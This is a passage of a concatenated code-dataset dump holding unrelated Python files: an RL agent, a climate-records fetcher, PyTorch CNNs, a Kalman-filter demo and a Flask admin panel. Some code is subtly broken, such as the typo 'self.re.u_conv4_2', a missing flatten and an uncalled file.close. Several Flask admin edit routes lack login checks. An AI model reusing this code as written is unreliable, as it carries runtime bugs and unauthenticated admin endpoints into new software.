如何应对拥挤不堪的工作与生活\\精要主义 如何应对拥挤不堪的工作与生活 _image_ocr_result.txt\")\n","sub_path":"scripts/tts_ws_python3.py","file_name":"tts_ws_python3.py","file_ext":"py","file_size_in_byte":7289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"576390210","text":"import threading, time\n\n\nclass MyThread( threading.Thread ):\n\n def __init__(self, name, T):\n\n super( MyThread, self ).__init__()\n self.time = T\n self.name = name\n\n def run(self):\n time.sleep( self.time )\n print( '%s have sleep %s' % (self.name, self.time) ,threading.current_thread(),threading.active_count())\n\n#\n# t1 = MyThread( 'hugh', 3 )\n#\n# t2 = MyThread( 'wong', 1 )\n#\n# t1.start()\n# t2.start()\n\nsttime = time.time()\n\nt_obj = []\n\nfor i in range(1 , 5000):\n\n t = MyThread('t-%s'%i,1)\n t.setDaemon(True) # 当前线程设置为守护线程\n t.start()\n t_obj.append(t)\n\n#\n# for i in t_obj:\n# i.join()\n\nendtime = time.time()\nprint(threading.current_thread())\nprint('total time is : ', endtime-sttime)\n\n\n","sub_path":"Week9/thread_ex1.py","file_name":"thread_ex1.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"126874115","text":"from agents.utils import *\n\nclass DDPGAgent():\n \"\"\"An implementation of a DDPG agent.\"\"\"\n \n def __init__(self, state_size, action_size, \n local_actor_network, local_critic_network, \n target_actor_network, target_critic_network, \n utilities, config, random_seed=1):\n \"\"\"DDPGAgent initialization.\n \n Keyword arguments:\n state_size (int): the state's dimensionality\n action_size (int): the number of available actions, \n or the dimensionality of the action vector\n local_actor_network (nn.Module): the local actor network\n local_critic_network (nn.Module): the local critic network\n target_actor_network (nn.Module): the actor network to optimiza against\n target_critic_network (nn.Module): the critic network to optimiza against\n config (components.Config): a configuration class \n random_seed (int): random seed -- default = 1\n \"\"\"\n # TODO: Make a config class to hold the hyperparams\n self.config = config.config\n self.params = self.config['params'][0]\n self.device = self.config['device']\n\n self.utilities = utilities\n\n self.state_size = state_size\n self.action_size = action_size\n self.seed = random.seed(random_seed)\n\n # actor network\n self.actor_local = local_actor_network.to(self.device)\n self.actor_target = target_actor_network.to(self.device)\n self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=self.params['act_lr'])\n\n # critic network\n self.critic_local = local_critic_network.to(self.device)\n self.critic_target = target_critic_network.to(self.device)\n self.critic_optimizer = optim.Adam(self.critic_local.parameters(), lr=self.params['cri_lr'], \n weight_decay=self.params['weight_decay'])\n \n # initial synchronization\n self.utilities.hard_copy(self.critic_local, self.critic_target)\n self.utilities.hard_copy(self.actor_local, self.actor_target)\n\n # initialize noise process to help with exploration\n self.noise = OUNoise(action_size, random_seed)\n\n # initialize replay memory\n self.memory = ReplayBuffer(action_size, self.params['buffer_size'], \n self.params['batch_size'], self.device, random_seed)\n \n def step(self, state, action, reward, next_state, done):\n \"\"\"Save experience in replay memory. 
\n Start the learning process if there are enough elements in memory.\"\"\"\n self.memory.add(state, action, reward, next_state, done)\n\n if len(self.memory) > self.params['batch_size']:\n experiences = self.memory.sample()\n self._learn(experiences, self.params['gamma'])\n\n def act(self, state, add_noise=True):\n \"\"\"Returns the best believed actions for a given state, with respect to the current policy.\"\"\"\n state = torch.from_numpy(state).float().unsqueeze(0).to(self.device)\n self.actor_local.eval() # switch model to evaluation mode\n with torch.no_grad():\n action = self.actor_local(state).cpu().data.numpy()\n self.actor_local.train() # switch back to train mode\n if add_noise: # add noise to the action to encourage exploration\n action += self.noise.sample()\n return np.clip(action, self.params['clip_min'], self.params['clip_max'])\n\n def reset(self):\n \"\"\"Resets the internal state of the noise to the mean.\"\"\"\n self.noise.reset()\n\n def _learn(self, experiences, gamma):\n \"\"\"Update policy and value parameters using given batch of experience tuples.\n\n Keyword arguments:\n experiences (Tuple): a tuple of experience tuples \n gamma (float): the return discount factor\n \"\"\"\n states, actions, rewards, next_states, dones = experiences\n\n # first update the critic\n # get the next actions, given the next states\n actions_next = self.actor_target(next_states)\n # estimate the Q of next states and actions\n Q_targets_next = self.critic_target(next_states, actions_next)\n # estimate Q targets for next states\n Q_targets = rewards + (gamma * Q_targets_next * (1.0 - dones))\n # estimate the expected Q value\n Q_expected = self.critic_local(states, actions)\n # compute citic loss \n critic_loss = F.mse_loss(Q_expected, Q_targets)\n # minimise loss \n self.critic_optimizer.zero_grad() \n critic_loss.backward() \n self.critic_optimizer.step() \n\n # then update the actor\n # compute actor loss\n actions_pred = self.actor_local(states)\n actor_loss = -self.critic_local(states, actions_pred).mean()\n # minimize the loss\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # aply soft updates to the target networks\n self.utilities.soft_update(self.critic_local, self.critic_target, self.params['tau'])\n self.utilities.soft_update(self.actor_local, self.actor_target, self.params['tau'])\n ","sub_path":"drl/agents/ddpg_agent.py","file_name":"ddpg_agent.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"371536386","text":"#!/usr/bin/python\n\n#############################################################\n# Script Name: climate_records.py\n# Version 2.1\n# Author: Aaron Treadway (aaron.treadway@noaa.gov)\n#\n# 10/15/14 - Started from Test Scripts from xmACIS Web \n# Services\n# 10/16/14 - Edited Initially by Aaron Treadway (AT)\n# 10/17/14 - elems and output added by Keith Eggleston (KE)\n# 10/18/14 - For loops and output changed (AT)\n# 10/18/14 - Changed the output from python shell to .txt \n# file (AT)\n# 10/19/14 - Changed the output to table form, changed \n# dictionaries\n# 10/24/14 - Added Comments...posted to Github\n#\n# Purpose: To have all of the Almanac information for the \n# day in one place for various climate sites\n#\n############################################################\n\n#import Python libraries\nimport urllib, urllib2\nimport datetime\nfrom time import gmtime, strftime\n\ntry :\n import json\nexcept ImportError :\n 
import simplejson as json\n \n#set up today and yesterday \n#could easily add a tomorrow also\ntoday = datetime.date.today()\ntime = datetime.time()\none_day = datetime.timedelta(days=1)\nyesterday = today - one_day\n\ntoday_month = today.month\ntoday_day = today.day\ntoday_climate = str(today_month) + \"-\" + str(today_day)\n\nyesterday_month = yesterday.month\nyesterday_day = yesterday.day\nyesterday_climate = str(yesterday_month) + \"-\" + str(yesterday_day)\n\n# -- EDIT THIS -- EDIT THIS -- EDIT THIS --\n#Choose sites using info in table 1 from:\n#http://www.rcc-acis.org/docs_webservices.html\n#Can have as many or as few as needed\nstations = [\"AUSthr\", \"ATTthr\", \"SATthr\", \"DRTthr\"]\n\n#creates .txt output file\n#writes header\nfile = open(\"climate_records.txt\", \"w\")\nfile.write(\"Temperature and Precipitation Record Information\")\nfile.write(\" \")\nfile.write(\" \"+ \"\\n\")\n\n#for loop that loops through all the information for the stations. \nfor site in stations:\n#Today's Temperature ---------------------------------------\n#calls ACIS Web Services Database\n\tinput_dictTt = {\n\t\t\t\"sid\": site,\n\t\t\t\"sdate\": \"por\",\n\t\t\t\"edate\": \"por\",\n\t\t\t\"meta\": [\"name\", \"state\"],\n\t\t\t\"elems\":[\n\t\t\t\t{\"name\":\"maxt\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\t\t\t\t\n{\"name\":\"mint\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"min\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\t\t\t\t\n\t\t\t\t{\"name\":\"maxt\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"min\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\t\t\t\t{\"name\":\"mint\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\n\t\t\t]\n\t\t}\n\n#Creates Today's Temperature Output dictionary\n\tparams = urllib.urlencode({'params':json.dumps(input_dictTt)})\n\treq = urllib2.Request('http://data.rcc-acis.org/StnData', params, {'Accept':'application/json'})\n\tresponse = urllib2.urlopen(req)\n\tresults = response.read()\n\ttodayt_dic_site = json.loads(results)\n\n#Yesterdays's Temperature ----------------------------------\n#calls ACIS Web Services Database\n\tinput_dictYt = {\n\t\t\t\"sid\": site,\n\t\t\t\"sdate\": \"por\",\n\t\t\t\"edate\": \"por\",\n\t\t\t\"meta\": [\"name\", \"state\"],\n\t\t\t\"elems\":[\n\t\t\t\t{\"name\":\"maxt\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\t\t\t\t\n{\"name\":\"mint\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"min\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\t\t\t\t\n\t\t\t\t{\"name\":\"maxt\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"min\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\t\t\t\t{\"name\":\"mint\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\n\t\t\t]\n\t\t}\n\n#Creates Yesterdays's Temperature Output dictionary\n\tparams = urllib.urlencode({'params':json.dumps(input_dictYt)})\n\treq = 
urllib2.Request('http://data.rcc-acis.org/StnData', params, {'Accept':'application/json'})\n\tresponse = urllib2.urlopen(req)\n\tresults = response.read()\n\tyesterdayt_dic_site = json.loads(results)\n\t\n#Todays's Precipitation ------------------------------------\n#calls ACIS Web Services Database\n\tinput_dictTp = {\n\t\t\t\"sid\": site,\n\t\t\t\"sdate\": \"por\",\n\t\t\t\"edate\": \"por\",\n\t\t\t\"meta\": [\"name\", \"state\"],\n\t\t\t\"elems\":[\n\t\t\t\t{\"name\":\"pcpn\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\n{\"name\":\"snow\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\n{\"name\":\"snwd\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\n\t\t\t]\n\t\t}\n\n#Creates Today's Precipitation Output dictionary\n\tparams = urllib.urlencode({'params':json.dumps(input_dictTp)})\n\treq = urllib2.Request('http://data.rcc-acis.org/StnData', params, {'Accept':'application/json'})\n\tresponse = urllib2.urlopen(req)\n\tresults = response.read()\n\ttodayp_dic_site = json.loads(results)\n\t\n\n#Yesterdays's Precipitation --------------------------------\n#calls ACIS Web Services Database\n\tinput_dictYp = {\n\t\t\t\"sid\": site,\n\t\t\t\"sdate\": \"por\",\n\t\t\t\"edate\": \"por\",\n\t\t\t\"meta\": [\"name\", \"state\"],\n\t\t\t\"elems\":[\n\t\t\t\t{\"name\":\"pcpn\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\n{\"name\":\"snow\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\n{\"name\":\"snwd\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\n\t\t\t]\n\t\t}\n\n#Creates Yesterdays's Precipitation Output dictionary\n\tparams = urllib.urlencode({'params':json.dumps(input_dictYp)})\n\treq = urllib2.Request('http://data.rcc-acis.org/StnData', params, {'Accept':'application/json'})\n\tresponse = urllib2.urlopen(req)\n\tresults = response.read()\n\tyesterdayp_dic_site = json.loads(results)\n\n#Output in table form. 
Included in the Loop\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| \" + site + \" | Record Max | Record Min | Record Low Max | Record High Min |\\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| Today | \" + todayt_dic_site[\"smry\"][0][0][0] + \" // \" + todayt_dic_site[\"smry\"][0][0][1] + \" | \" + todayt_dic_site[\"smry\"][1][0][0] + \" // \" + todayt_dic_site[\"smry\"][1][0][1] + \" | \" + todayt_dic_site[\"smry\"][2][0][0] + \" // \" + todayt_dic_site[\"smry\"][2][0][1] + \" | \" + todayt_dic_site[\"smry\"][3][0][0] + \" // \" + todayt_dic_site[\"smry\"][3][0][1] + \" | \\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| Yesterday | \" + yesterdayt_dic_site[\"smry\"][0][0][0] + \" // \" + yesterdayt_dic_site[\"smry\"][0][0][1] + \" | \" + yesterdayt_dic_site[\"smry\"][1][0][0] + \" // \" + yesterdayt_dic_site[\"smry\"][1][0][1] + \" | \" + yesterdayt_dic_site[\"smry\"][2][0][0] + \" // \" + yesterdayt_dic_site[\"smry\"][2][0][1] + \" | \" + yesterdayt_dic_site[\"smry\"][3][0][0] + \" // \" + yesterdayt_dic_site[\"smry\"][3][0][1] + \" | \\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| \" + site + \" | Record Rainfall | Record Snowfall | Record Snow Depth |\\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| Today | \" + todayp_dic_site[\"smry\"][0][0][0] + \" // \" + todayp_dic_site[\"smry\"][0][0][1] + \" | \" + todayp_dic_site[\"smry\"][1][0][0] + \" // \" + todayp_dic_site[\"smry\"][1][0][1] + \" | \" + todayp_dic_site[\"smry\"][2][0][0] + \" // \" + todayp_dic_site[\"smry\"][2][0][1] + \" | \\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| Yesterday | \" + yesterdayp_dic_site[\"smry\"][0][0][0] + \" // \" + yesterdayp_dic_site[\"smry\"][0][0][1] + \" | \" + yesterdayp_dic_site[\"smry\"][1][0][0] + \" // \" + yesterdayp_dic_site[\"smry\"][1][0][1] + \" | \" + yesterdayp_dic_site[\"smry\"][2][0][0] + \" // \" + yesterdayp_dic_site[\"smry\"][2][0][1] + \" | \\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"\\n\")\n\t \n#prints the time the script ran to confirm.\nfile.write(\"Updated:\"+strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n#closes the .txt file\nfile.close\n","sub_path":"climate_records.py","file_name":"climate_records.py","file_ext":"py","file_size_in_byte":8865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"305150506","text":"# -*- coding: utf-8 -*-\nimport torch\nimport torchvision \nimport torch.nn as nn\n\nclass model(nn.Module):\n def __init__(self):\n super(model, self).__init__()\n self.conv1_1 = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=5, stride=2, padding=0)\n self.relu_conv1_1 = nn.PReLU()\n self.pool1 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv2_1 = nn.Conv2d(in_channels=8, out_channels=16, kernel_size=3, stride=1, padding=0)\n self.relu_conv2_1 = nn.PReLU()\n self.conv2_2 = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=3, stride=1, padding=0)\n self.relu_conv2_2 = nn.PReLU()\n 
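The climate_records.py record above runs the same urlencode -> Request -> urlopen -> json.loads sequence four times over near-identical parameter dictionaries, and its closing file.close is missing the parentheses needed to actually call the method, so the output file is never explicitly closed. A minimal sketch of factoring that request boilerplate into one helper, keeping the record's Python 2 urllib/urllib2 style; the acis_query name is illustrative, not from the record:

```python
import json
import urllib
import urllib2


def acis_query(input_dict):
    """POST one ACIS Web Services parameter dict and return the decoded JSON reply."""
    params = urllib.urlencode({'params': json.dumps(input_dict)})
    req = urllib2.Request('http://data.rcc-acis.org/StnData', params,
                          {'Accept': 'application/json'})
    return json.loads(urllib2.urlopen(req).read())
```

Each of the four blocks then collapses to a single call such as todayt_dic_site = acis_query(input_dictTt), and opening the report with a `with open(...)` block would close it reliably.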
self.pool2 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv3_1 = nn.Conv2d(in_channels=16, out_channels=24, kernel_size=3, stride=1, padding=0)\n self.relu_conv3_1 = nn.PReLU()\n self.conv3_2 = nn.Conv2d(in_channels=24,out_channels=24, kernel_size=3, stride=1, padding=0)\n self.relu_conv3_2 = nn.PReLU()\n self.pool3 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv4_1 = nn.Conv2d(in_channels=24, out_channels=40, kernel_size=3, stride=1, padding=1)\n self.relu_conv4_1 = nn.PReLU()\n self.conv4_2 = nn.Conv2d(in_channels=40, out_channels=80, kernel_size=3, stride=1, padding=1)\n self.relu_conv4_2 = nn.PReLU()\n self.ip1 = nn.Linear(4*4*80, 128)\n self.relu_ip1 = nn.PReLU()\n self.ip2 = nn.Linear(128, 128)\n self.relu_ip2 = nn.PReLU()\n self.ip3 = nn.Linear(128, 42)\n \n def forward(self, x):\n x = self.conv1_1(x)\n x = self.relu_conv1_1(x)\n x = self.pool1(x)\n x = self.conv2_1(x)\n x = self.relu_conv2_1(x)\n x = self.conv2_2(x)\n x = self.relu_conv2_2(x)\n x = self.pool2(x)\n x = self.conv3_1(x)\n x = self.relu_conv3_1(x)\n x = self.conv3_2(x)\n x = self.relu_conv3_2(x)\n x = self.pool3(x)\n x = self.conv4_1(x)\n x = self.relu_conv4_1(x)\n x = self.conv4_2(x)\n x = self.re.u_conv4_2(x)\n x = self.ip1(x)\n x = self.relu_ip1(x)\n x = self.ip2(x)\n x = self.relu_ip2(x)\n x = self.ip3(x)\n return x\n\nclass LeNet(nn.Module):\n def __init__(self, num_classes):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5, stride=1, padding=2)\n self.relu1 = nn.ReLU()\n self.pooling1 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv2 = nn.Conv2d(in_channels=6, out_channels=16, kernel_size=5, stride=1)\n self.relu2 = nn.ReLU()\n self.pooling2 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv3 = nn.Conv2d(in_channels=16, out_channels=120, kernel_size=5, stride=1)\n self.relu3 = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.fc2 = nn.Linear(84, num_classes)\n \n def forward(self, x):\n x = self.conv1(x)\n x = self.relu1(x)\n x = self.pooling1(x)\n x = self.conv2(x)\n x = self.relu2(x)\n x = self.pooling2(x)\n x = self.conv3(x)\n x = self.relu3(x)\n x = x.view(x.size()[0], -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\n \n\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"375442520","text":"from typing import List\r\n\r\n\r\nclass Solution:\r\n def __init__(self):\r\n self.res = []\r\n\r\n def combinationSum(self, candidates: List[int], target: int):\r\n one_ans = []\r\n start = 0\r\n candidates.sort()\r\n self.combination_sum_memo(candidates, target, start, one_ans)\r\n return self.res\r\n\r\n def combination_sum_memo(self, candidates: List[int], target: int, start: int, one_ans: List[int]):\r\n if target == 0:\r\n self.res.append(one_ans[:])\r\n return\r\n for i in range(start, len(candidates)):\r\n if candidates[i] > target:\r\n return\r\n one_ans.append(candidates[i])\r\n self.combination_sum_memo(candidates, target - candidates[i], i, one_ans)\r\n one_ans.pop()\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n sol2 = Solution()\r\n print(sol2.combinationSum([2, 3, 6, 7], 7))\r\n print(sol2.combinationSum([2, 3, 5], 8))\r\n print(sol2.combinationSum([8, 7, 4, 3], 11))\r\n","sub_path":"backtracking/39 combinationSum.py","file_name":"39 combinationSum.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
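Two bugs in the model.py record above are worth flagging for anyone reusing it: the forward pass calls x = self.re.u_conv4_2(x), a typo for self.relu_conv4_2(x) that raises AttributeError at runtime, and it feeds the 4-D output of conv4_2 straight into ip1 = nn.Linear(4*4*80, 128) without flattening. A self-contained check of the flatten step, assuming the (batch, 80, 4, 4) feature map implied by ip1's input size:

```python
import torch
import torch.nn as nn

# nn.Linear consumes (batch, features); conv layers emit (batch, C, H, W).
feat = torch.randn(2, 80, 4, 4)           # stand-in for the conv4_2 output
flat = feat.view(feat.size(0), -1)        # reshape to (2, 4*4*80) = (2, 1280)
out = nn.Linear(4 * 4 * 80, 128)(flat)    # OK; passing `feat` directly raises
print(out.shape)                          # torch.Size([2, 128])
```

In the record itself the fix is one view() call between relu_conv4_2 and ip1, mirroring the x.view(x.size()[0], -1) that the LeNet class in the same file already performs.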
+{"seq_id":"627004176","text":"import win32api\nimport numpy as np\nfrom filterpy.common import kinematic_kf\nfrom filterpy.kalman import ExtendedKalmanFilter\nimport cv2\nimport time\nimport filterpy as fp\nfrom filterpy.kalman import IMMEstimator\nnp.set_printoptions(suppress=True)\norder=1\nkf1 = kinematic_kf(dim=2, order=order)\nkf2 = ExtendedKalmanFilter(4, 2)\n# do some settings of x, R, P etc. here, I'll just use the defaults\nkf2.Q *= 0 # no prediction error in second filter\nfilters = [kf1, kf2]\nmu = [0.5, 0.5] # each filter is equally likely at the start\ntrans = np.array([[0.97, 0.03], [0.03, 0.97]])\nimm = IMMEstimator(filters, mu, trans)\n\nbg_image = cv2.imread('bg.png') # 500,1000\ncv2.imshow('KalmanFilterDemo', bg_image)\ncv2.moveWindow(\"KalmanFilterDemo\", 0, 0)\nwindow_ul = (8, 30) # x,y\nboxhsize = (20, 10)\nlastul=(0,0)\nlastbr=(0,0)\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nvideof=cv2.VideoWriter('video.avi',fourcc,1,(1000,500))\n\nwhile True:\n start_time = time.time() # start time of the loop\n frame = bg_image.copy()\n x, y = win32api.GetCursorPos()\n x = x - window_ul[0]\n y = y - window_ul[1]\n cv2.rectangle(frame, (x - boxhsize[0], y - boxhsize[1]), (x + boxhsize[0], y + boxhsize[1]), (0, 255, 0), 3)\n\n z = np.array([[x], [y]])\n imm.update(z)\n imm.predict()\n\n print(imm.x.T)\n # if order==1:\n # xp=imm.x_prior[0]\n # yp=imm.x_prior[2]\n # elif order==2:\n # xp=imm.x_prior[0]\n # yp=imm.x_prior[3]\n new_vals=imm.x.T[0]\n if order==1:\n xp=int(new_vals[0])\n yp=int(new_vals[2])\n elif order==2:\n xp=int(new_vals[0])\n yp=int(new_vals[3])\n for item in imm.x_prior:\n print(item[0],' ',end='')\n #cv2.rectangle(frame, lastul, lastbr, (255, 0, 0), 1)\n\n print()\n lastul=(xp - boxhsize[0], yp - boxhsize[1])\n lastbr=(xp + boxhsize[0], yp + boxhsize[1])\n cv2.rectangle(frame, (xp - boxhsize[0], yp - boxhsize[1]), (xp + boxhsize[0], yp + boxhsize[1]), (255, 0, 0), 1)\n cv2.imshow('KalmanFilterDemo', frame)\n videof.write(frame)\n #print(x, ' ', y)\n k = cv2.waitKey(100) & 0xff\n if k == 27: break\n print(\"FPS: \", 1.0 / (time.time() - start_time)) # FPS = 1 / time to process loop","sub_path":"EKFTest.py","file_name":"EKFTest.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"631423673","text":"# -*- coding:utf8 -*-\n\nimport datetime\nimport copy\n\nfrom flask import render_template, redirect, url_for, flash, request\nfrom sqlalchemy.sql import func\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom . import manage\nfrom .. 
import db\nfrom ..models import User, MainCarousel, MainEntrance, MainNews, DesignCarousel, DesignNews, DesignProject, Event, \\\n EventMember, Contact, HotWord, Other, AppleOther\n\nfrom .forms import LoginForm, ChangePasswordForm, AddNewsForm\n\n\n@manage.route('/')\ndef index():\n return render_template('admin/index.html')\n\n\n@manage.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n # users = User.query.order_by(User.id).all()\n # for u in users:\n # print u.username\n # u.password = '111111'\n # print u.password_hash\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is not None and user.verify_password(form.password.data):\n login_user(user, 1)\n return redirect(request.args.get('next') or url_for('manage.index'))\n flash(u'用户名 或 密码 错误')\n\n return render_template('admin/login.html', form=form)\n\n\n@manage.route('/logout')\n@login_required\ndef logout():\n logout_user()\n flash('You have been logged out.')\n return redirect(url_for('admin.login'))\n\n\n@manage.route('/change-password', methods=['GET', 'POST'])\n@login_required\ndef change_password():\n form = ChangePasswordForm()\n if form.validate_on_submit():\n if current_user.verify_password(form.old_password.data):\n current_user.password = form.password.data\n db.session.add(current_user)\n flash('Your password has been updated.')\n return redirect(url_for('manage.login'))\n else:\n flash('Invalid password.')\n return render_template(\"admin/change_password.html\", form=form)\n\n\n@manage.route('/main_carousel')\ndef main_carousel():\n carousels = MainCarousel.query.order_by(MainCarousel.sort.asc()).all()\n return render_template(\"admin/main_carousel.html\", carousels=carousels)\n\n\n@manage.route('/main_carousel/add', methods=['GET', 'POST'])\ndef main_carousel_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n slider = MainCarousel.query.get(id)\n\n return render_template(\"admin/main_carousel_detail.html\", slider=slider)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n web_cover = request.values.get('web_cover', '')\n wap_cover = request.values.get('wap_cover', '')\n\n slider = MainCarousel.query.get(id)\n if not slider:\n slider = MainCarousel()\n\n slider.ch_title = ch_title\n slider.en_title = en_title\n slider.web_cover = web_cover\n slider.wap_cover = wap_cover\n db.session.add(slider)\n\n return redirect(url_for('manage.main_carousel'))\n\n\n@manage.route('/main_carousel//')\ndef main_carousel_state(id, state):\n slider = MainCarousel.query.get(id)\n slider.state = state\n\n if state == 0:\n flash(u'轮播图:<%s>已隐藏' % slider.ch_title)\n elif state == 1:\n\n flash(u'轮播图:<%s>已外显' % slider.ch_title)\n\n return redirect(url_for('manage.main_carousel'))\n\n\n@manage.route('/main_carousel//sort/')\ndef main_carousel_sort(id, move):\n slider = MainCarousel.query.get(id)\n\n if (slider.sort == 1 and move == 'up') or (slider.sort == 4 and move == 'down'):\n pass\n else:\n if move == 'up':\n tmp_s = MainCarousel.query.filter_by(sort=slider.sort - 1).first()\n\n slider.sort -= 1\n tmp_s.sort += 1\n else:\n tmp_s = MainCarousel.query.filter_by(sort=slider.sort + 1).first()\n\n slider.sort += 1\n tmp_s.sort -= 1\n\n db.session.add(slider)\n db.session.add(tmp_s)\n db.session.commit()\n\n return redirect(url_for('manage.main_carousel'))\n\n\n@manage.route('/main_entrance')\ndef main_entrance():\n entrance = 
MainEntrance.query.order_by(MainEntrance.id.asc()).all()\n return render_template(\"admin/main_entrance.html\", entrance=entrance)\n\n\n@manage.route('/main_entrance/add', methods=['GET', 'POST'])\ndef main_entrance_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n slider = MainEntrance.query.get(id)\n\n return render_template(\"admin/main_entrance_detail.html\", slider=slider)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n ch_url = request.values.get('ch_url', '')\n en_url = request.values.get('en_url', '')\n ch_summary = request.values.get('ch_summary', '')\n en_summary = request.values.get('en_summary', '')\n cover = request.values.get('cover', '')\n\n slider = MainEntrance.query.get(id)\n if not slider:\n slider = MainEntrance()\n\n slider.ch_title = ch_title\n slider.ch_url = ch_url\n slider.ch_summary = ch_summary\n\n slider.en_title = en_title\n slider.en_url = en_url\n slider.en_summary = en_summary\n slider.cover = cover\n db.session.add(slider)\n\n return redirect(url_for('manage.main_entrance'))\n\n\n\n\n\n\n@manage.route('/main_news')\ndef main_news():\n page = request.args.get('page', 1, type=int)\n pagination = MainNews.query.order_by(MainNews.create_time.desc()).paginate(page, per_page=10, error_out=False)\n news = pagination.items\n return render_template(\"admin/main_news.html\", news=news, pagination=pagination)\n\n\n@manage.route('/main_news/add', methods=['GET', 'POST'])\ndef main_news_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n news = MainNews.query.get(id)\n\n return render_template(\"admin/main_news_detail.html\", news=news)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n ch_author = request.values.get('ch_author', '')\n en_author = request.values.get('en_author', '')\n ch_content = request.values.get('ch_content', '')\n en_content = request.values.get('en_content', '')\n\n news = MainNews.query.get(id)\n if not news:\n news = MainNews()\n\n news.ch_title = ch_title\n news.en_title = en_title\n news.ch_author = ch_author\n news.en_author = en_author\n news.ch_content = ch_content\n news.en_content = en_content\n db.session.add(news)\n\n return 